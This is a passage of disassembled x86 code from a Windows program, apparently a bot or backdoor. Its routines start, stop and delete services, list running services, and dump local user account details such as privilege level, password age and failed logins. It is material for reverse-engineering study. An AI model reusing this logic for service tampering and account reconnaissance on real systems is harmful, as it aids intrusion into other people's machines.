test esi, esi
jg short loc_41B3DF
mov eax, [ebp+8]
add eax, edi
loc_41B45C: ; CODE XREF: seg000:0041B463�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41B461: ; CODE XREF: seg000:0041B429�j
xor eax, eax
jmp short loc_41B45C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B465 proc near ; CODE XREF: sub_41BF46+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
push 0F003Fh
xor ebx, ebx
push ebx
push ebx
call ds:dword_4441C8 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_41B48C
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_41B501
; ---------------------------------------------------------------------------
loc_41B48C: ; CODE XREF: sub_41B465+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call ds:dword_44424C ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_41B4AC
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_41B4F9
; ---------------------------------------------------------------------------
loc_41B4AC: ; CODE XREF: sub_41B465+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_41B4DF
cmp eax, 3
jz short loc_41B4D0
jle short loc_41B4F2
cmp eax, 6
jg short loc_41B4F2
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call ds:dword_4441EC ; ControlService
jmp short loc_41B4E6
; ---------------------------------------------------------------------------
loc_41B4D0: ; CODE XREF: sub_41B465+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call ds:dword_4441D0 ; StartServiceA
jmp short loc_41B4E6
; ---------------------------------------------------------------------------
loc_41B4DF: ; CODE XREF: sub_41B465+4D�j
push esi
call ds:dword_4440F4 ; DeleteService
loc_41B4E6: ; CODE XREF: sub_41B465+69�j
; sub_41B465+78�j
test eax, eax
jnz short loc_41B4F2
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ebx, eax
loc_41B4F2: ; CODE XREF: sub_41B465+54�j
; sub_41B465+59�j ...
push esi
call ds:dword_444134 ; CloseServiceHandle
loc_41B4F9: ; CODE XREF: sub_41B465+45�j
push edi
call ds:dword_444134 ; CloseServiceHandle
pop esi
loc_41B501: ; CODE XREF: sub_41B465+25�j
pop edi
mov eax, ebx
pop ebx
leave
retn
sub_41B465 endp
; =============== S U B R O U T I N E =======================================
sub_41B507 proc near ; CODE XREF: sub_41BF46:loc_41BF8E�p
mov ecx, 420h
cmp eax, ecx
ja loc_41B5B8
jz loc_41B5B1
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_41B57B
jz short loc_41B571
mov ecx, eax
sub ecx, 3
jz short loc_41B567
dec ecx
dec ecx
jz short loc_41B55D
dec ecx
jz short loc_41B553
sub ecx, 51h
jz short loc_41B549
sub ecx, 24h
jnz loc_41B62E ; default
; jumptable 0041B5D5 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B549: ; CODE XREF: sub_41B507+2D�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B553: ; CODE XREF: sub_41B507+28�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B55D: ; CODE XREF: sub_41B507+25�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B567: ; CODE XREF: sub_41B507+21�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B571: ; CODE XREF: sub_41B507+1A�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B57B: ; CODE XREF: sub_41B507+18�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_41B5AA
dec ecx
jz short loc_41B5A3
dec ecx
jz short loc_41B59C
dec ecx
jnz loc_41B62E ; default
; jumptable 0041B5D5 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_41B620
; ---------------------------------------------------------------------------
loc_41B59C: ; CODE XREF: sub_41B507+82�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5A3: ; CODE XREF: sub_41B507+7F�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5AA: ; CODE XREF: sub_41B507+7C�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5B1: ; CODE XREF: sub_41B507+D�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5B8: ; CODE XREF: sub_41B507+7�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_41B62E ; default
; jumptable 0041B5D5 cases 1,5,6,8,9,12,13,15,16
jz short loc_41B61B
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_41B62E ; default
; jumptable 0041B5D5 cases 1,5,6,8,9,12,13,15,16
movzx ecx, byte_41B66F[ecx]
jmp off_41B647[ecx*4] ; switch jump
loc_41B5DC: ; DATA XREF: seg000:off_41B647�o
push offset aTheSpecifiedDa ; jumptable 0041B5D5 case 7
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5E3: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: seg000:off_41B647�o
push offset aTheServiceDepe ; jumptable 0041B5D5 case 17
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5EA: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: seg000:off_41B647�o
push offset aTheServiceDe_0 ; jumptable 0041B5D5 case 10
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5F1: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: seg000:off_41B647�o
push offset aTheServiceHasB ; jumptable 0041B5D5 case 0
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5F8: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: seg000:off_41B647�o
push offset aTheSpecified_0 ; jumptable 0041B5D5 case 2
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B5FF: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: seg000:off_41B647�o
push offset aTheServiceCoul ; jumptable 0041B5D5 case 11
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B606: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: seg000:off_41B647�o
push offset aTheServiceHa_0 ; jumptable 0041B5D5 case 14
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B60D: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: seg000:off_41B647�o
push offset aTheRequested_1 ; jumptable 0041B5D5 case 3
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B614: ; CODE XREF: sub_41B507+CE�j
; DATA XREF: seg000:off_41B647�o
push offset aTheServiceHasN ; jumptable 0041B5D5 case 4
jmp short loc_41B620
; ---------------------------------------------------------------------------
loc_41B61B: ; CODE XREF: sub_41B507+BA�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_41B620: ; CODE XREF: sub_41B507+3D�j
; sub_41B507+47�j ...
push offset dword_4E1EA8
call sub_41E6A6
pop ecx
pop ecx
jmp short loc_41B641
; ---------------------------------------------------------------------------
loc_41B62E: ; CODE XREF: sub_41B507+32�j
; sub_41B507+85�j ...
push eax ; default
; jumptable 0041B5D5 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_4E1EA8
call sub_41E6A6
add esp, 0Ch
loc_41B641: ; CODE XREF: sub_41B507+125�j
mov eax, offset dword_4E1EA8
retn
sub_41B507 endp
; ---------------------------------------------------------------------------
off_41B647 dd offset loc_41B5F1 ; DATA XREF: sub_41B507+CE�r
dd offset loc_41B5F8 ; jump table for switch statement
dd offset loc_41B60D
dd offset loc_41B614
dd offset loc_41B5DC
dd offset loc_41B5EA
dd offset loc_41B5FF
dd offset loc_41B606
dd offset loc_41B5E3
dd offset loc_41B62E
byte_41B66F db 0, 9, 1, 2 ; DATA XREF: sub_41B507+C7�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B681 proc near ; CODE XREF: sub_40274D+430E�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call ds:dword_4441C8 ; OpenSCManagerA
push ebx
push [ebp+arg_8]
mov [ebp+var_C], eax
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 14h
loc_41B6B9: ; CODE XREF: sub_41B681+123�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 168h
lea eax, [ebp+var_18C]
push eax
push 3
push 30h
push [ebp+var_C]
call ds:dword_4441D8 ; EnumServicesStatusA
test eax, eax
jnz short loc_41B6F3
call ds:dword_42B01C ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_41B7AA
loc_41B6F3: ; CODE XREF: sub_41B681+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_41B7A1
lea esi, [ebp+var_188]
loc_41B704: ; CODE XREF: sub_41B681+11A�j
mov eax, [esi+8]
dec eax
jz short loc_41B750
dec eax
jz short loc_41B749
dec eax
jz short loc_41B742
dec eax
jz short loc_41B73B
dec eax
jz short loc_41B734
dec eax
jz short loc_41B72D
dec eax
lea eax, [ebp+var_20]
jz short loc_41B726
push offset aUnknown_0 ; " Unknown"
jmp short loc_41B758
; ---------------------------------------------------------------------------
loc_41B726: ; CODE XREF: sub_41B681+9C�j
push offset aPaused ; " Paused"
jmp short loc_41B758
; ---------------------------------------------------------------------------
loc_41B72D: ; CODE XREF: sub_41B681+96�j
push offset aPausing ; " Pausing"
jmp short loc_41B755
; ---------------------------------------------------------------------------
loc_41B734: ; CODE XREF: sub_41B681+93�j
push offset aContinuing ; " Continuing"
jmp short loc_41B755
; ---------------------------------------------------------------------------
loc_41B73B: ; CODE XREF: sub_41B681+90�j
push offset aRunning ; " Running"
jmp short loc_41B755
; ---------------------------------------------------------------------------
loc_41B742: ; CODE XREF: sub_41B681+8D�j
push offset aStoping ; " Stoping"
jmp short loc_41B755
; ---------------------------------------------------------------------------
loc_41B749: ; CODE XREF: sub_41B681+8A�j
push offset aStarting ; " Starting"
jmp short loc_41B755
; ---------------------------------------------------------------------------
loc_41B750: ; CODE XREF: sub_41B681+87�j
push offset aStopped ; " Stopped"
loc_41B755: ; CODE XREF: sub_41B681+B1�j
; sub_41B681+B8�j ...
lea eax, [ebp+var_20]
loc_41B758: ; CODE XREF: sub_41B681+A3�j
; sub_41B681+AA�j
push eax
call sub_41E6A6
pop ecx
pop ecx
push dword ptr [esi]
lea eax, [ebp+var_20]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_3 ; "%s: %s (%s)"
push eax
call sub_41E6A6
push 1
push [ebp+arg_8]
lea eax, [ebp+var_38C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_41B704
loc_41B7A1: ; CODE XREF: sub_41B681+77�j
cmp [ebp+var_8], ebx
jnz loc_41B6B9
loc_41B7AA: ; CODE XREF: sub_41B681+6C�j
push [ebp+var_C]
call ds:dword_444134 ; CloseServiceHandle
xor eax, eax
cmp eax, [ebp+var_4]
pop edi
sbb eax, eax
pop esi
neg eax
pop ebx
leave
retn
sub_41B681 endp
; =============== S U B R O U T I N E =======================================
sub_41B7C1 proc near ; CODE XREF: sub_41B883+A�p
; sub_41B883+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_41B7CE
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41B7CE: ; CODE XREF: sub_41B7C1+9�j
push ebx
push esi
mov esi, ds:dword_42B07C
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_41FEB2
pop ecx
push edi
mov ebx, eax
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn
sub_41B7C1 endp
; =============== S U B R O U T I N E =======================================
sub_41B802 proc near ; CODE XREF: seg000:0041CDD0�p
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_20 = dword ptr 24h
mov eax, offset aDjc ; "¸¤¦C"
call sub_420364
push esi
xor esi, esi
cmp [esp+4+arg_10], esi
jnz short loc_41B819
xor eax, eax
jmp short loc_41B875
; ---------------------------------------------------------------------------
loc_41B819: ; CODE XREF: sub_41B802+11�j
push ebx
push ebp
push edi
mov edi, ds:dword_42B090
push esi
push esi
push esi
push esi
push 0FFFFFFFFh
push [esp+24h+arg_10]
mov ebx, 400h
push ebx
push esi
call edi ; WideCharToMultiByte
test byte ptr ds:dword_4E1F08, 1
mov ebp, eax
jnz short loc_41B85A
or ds:dword_4E1F08, 1
lea eax, [ebp+1]
push eax
mov [esp+4+arg_14], esi
call sub_41FEB2
pop ecx
mov ds:dword_4E1F04, eax
loc_41B85A: ; CODE XREF: sub_41B802+3C�j
push esi
push esi
push ebp
push ds:dword_4E1F04
push 0FFFFFFFFh
push [esp+14h+arg_20]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, ds:dword_4E1F04
pop edi
pop ebp
pop ebx
loc_41B875: ; CODE XREF: sub_41B802+15�j
mov ecx, [esp+4]
pop esi
mov large fs:0, ecx
leave
retn
sub_41B802 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B883 proc near ; CODE XREF: sub_41BFBE+6C�p
; seg000:0041D039�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push edi
push [ebp+arg_0]
call sub_41B7C1
push [ebp+arg_4]
mov edi, eax
call sub_41B7C1
push 24h
push [ebp+arg_4]
mov [ebp+var_24], eax
call sub_41EFD0
push [ebp+arg_8]
neg eax
sbb eax, eax
and [ebp+var_1C], 0
or [ebp+var_14], 0FFFFFFFFh
and [ebp+var_10], 0
and eax, 80000000h
mov [ebp+var_20], eax
mov [ebp+var_18], 7Fh
call sub_41B7C1
and [ebp+var_8], 0
add esp, 14h
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 2
push edi
call ds:dword_4440E8
pop edi
leave
retn
sub_41B883 endp
; =============== S U B R O U T I N E =======================================
sub_41B8EE proc near ; CODE XREF: sub_41BFBE+20�p
; seg000:0041CD45�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_41B7C1
push [esp+8+arg_4]
mov esi, eax
call sub_41B7C1
pop ecx
pop ecx
push 0
push eax
push esi
call ds:dword_444104
pop esi
retn
sub_41B8EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B911 proc near ; CODE XREF: sub_41C19B+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_41B7C1
push [ebp+arg_4]
mov edi, eax
call sub_41B7C1
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_41B7C1
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
add esp, 0Ch
lea ecx, [ebp+var_4]
push ecx
mov [ebp+var_20], eax
xor eax, eax
lea ecx, [ebp+var_24]
inc eax
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call ds:dword_4440C8
pop edi
leave
retn
sub_41B911 endp
; =============== S U B R O U T I N E =======================================
sub_41B96B proc near ; CODE XREF: sub_41C19B+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_41B7C1
push [esp+8+arg_4]
mov esi, eax
call sub_41B7C1
pop ecx
pop ecx
push eax
push esi
call ds:dword_4441D4
pop esi
retn
sub_41B96B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B98C proc near ; CODE XREF: sub_41C19B+2D�p
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 208h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_41B7C1
push [ebp+arg_4]
mov esi, eax
call sub_41B7C1
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call ds:dword_4440EC
test eax, eax
mov [ebp+var_8], eax
jnz loc_41BD19
mov eax, [ebp+var_4]
test eax, eax
jz loc_41BD54
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_208]
push offset aAccountS ; "Account: %S"
push eax
call sub_41E6A6
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_208]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_208]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_208]
push offset aCommentS ; "Comment: %S"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
mov eax, [eax+10h]
add esp, 40h
sub eax, 0
jz short loc_41BAA5
dec eax
jz short loc_41BA9E
dec eax
jz short loc_41BA97
mov eax, offset aUnknown ; "Unknown"
jmp short loc_41BAAA
; ---------------------------------------------------------------------------
loc_41BA97: ; CODE XREF: sub_41B98C+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_41BAAA
; ---------------------------------------------------------------------------
loc_41BA9E: ; CODE XREF: sub_41B98C+FF�j
mov eax, offset aUser_1 ; "User"
jmp short loc_41BAAA
; ---------------------------------------------------------------------------
loc_41BAA5: ; CODE XREF: sub_41B98C+FC�j
mov eax, offset aGuest ; "Guest"
loc_41BAAA: ; CODE XREF: sub_41B98C+109�j
; sub_41B98C+110�j ...
push eax
lea eax, [ebp+var_208]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_208]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_208]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_208]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_208]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_208]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_208]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_208]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_208]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_208]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_208]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_208]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_208]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_208]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_208]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_41E6A6
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_40123B
add esp, 20h
pop edi
pop ebx
jmp short loc_41BD45
; ---------------------------------------------------------------------------
loc_41BD19: ; CODE XREF: sub_41B98C+35�j
push eax
lea eax, [ebp+var_208]
push offset unk_438134
push eax
call sub_41E6A6
push 0
push [ebp+arg_10]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40123B
add esp, 20h
loc_41BD45: ; CODE XREF: sub_41B98C+38B�j
cmp [ebp+var_4], 0
jz short loc_41BD54
push [ebp+var_4]
call ds:dword_444140
loc_41BD54: ; CODE XREF: sub_41B98C+40�j
; sub_41B98C+3BD�j
mov eax, [ebp+var_8]
pop esi
leave
retn
sub_41B98C endp
; =============== S U B R O U T I N E =======================================
sub_41BD5A proc near ; CODE XREF: sub_41BE8A+9E�p
; sub_41BFBE:loc_41BFFE�p ...
mov ecx, 858h
cmp eax, ecx
ja loc_41BE08
jz loc_41BE01
cmp eax, 7Bh
ja short loc_41BDCD
jz short loc_41BDC3
cmp eax, 5
jz short loc_41BDB9
cmp eax, 8
jz short loc_41BDAF
cmp eax, 32h
jz short loc_41BDA5
cmp eax, 35h
jz short loc_41BD9B
cmp eax, 57h
jnz loc_41BE57
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BD9B: ; CODE XREF: sub_41BD5A+2C�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDA5: ; CODE XREF: sub_41BD5A+27�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDAF: ; CODE XREF: sub_41BD5A+22�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDB9: ; CODE XREF: sub_41BD5A+1D�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDC3: ; CODE XREF: sub_41BD5A+18�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDCD: ; CODE XREF: sub_41BD5A+16�j
sub eax, 7Ch
jz short loc_41BDFA
sub eax, 7C8h
jz short loc_41BDF3
dec eax
jz short loc_41BDE9
dec eax
jnz short loc_41BE57
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDE9: ; CODE XREF: sub_41BD5A+80�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDF3: ; CODE XREF: sub_41BD5A+7D�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BDFA: ; CODE XREF: sub_41BD5A+76�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE01: ; CODE XREF: sub_41BD5A+D�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE08: ; CODE XREF: sub_41BD5A+7�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_41BE41
jz short loc_41BE3A
sub eax, 8ADh
jz short loc_41BE6C
dec eax
dec eax
jz short loc_41BE33
dec eax
jz short loc_41BE2C
dec eax
dec eax
jnz short loc_41BE57
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE2C: ; CODE XREF: sub_41BD5A+C5�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE33: ; CODE XREF: sub_41BD5A+C2�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE3A: ; CODE XREF: sub_41BD5A+B7�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE41: ; CODE XREF: sub_41BD5A+B5�j
sub eax, 8CAh
jz short loc_41BE73
sub eax, 17h
jz short loc_41BE6C
sub eax, 25h
jz short loc_41BE65
sub eax, 29h
jz short loc_41BE5E
loc_41BE57: ; CODE XREF: sub_41BD5A+31�j
; sub_41BD5A+83�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE5E: ; CODE XREF: sub_41BD5A+FB�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE65: ; CODE XREF: sub_41BD5A+F6�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE6C: ; CODE XREF: sub_41BD5A+BE�j
; sub_41BD5A+F1�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_41BE78
; ---------------------------------------------------------------------------
loc_41BE73: ; CODE XREF: sub_41BD5A+EC�j
push offset aNetworkConnect ; "Network connection not found."
loc_41BE78: ; CODE XREF: sub_41BD5A+3C�j
; sub_41BD5A+46�j ...
push offset dword_4E1F10
call sub_41E6A6
pop ecx
pop ecx
mov eax, offset dword_4E1F10
retn
sub_41BD5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE8A proc near ; CODE XREF: sub_40274D+44CA�p
var_71C = byte ptr -71Ch
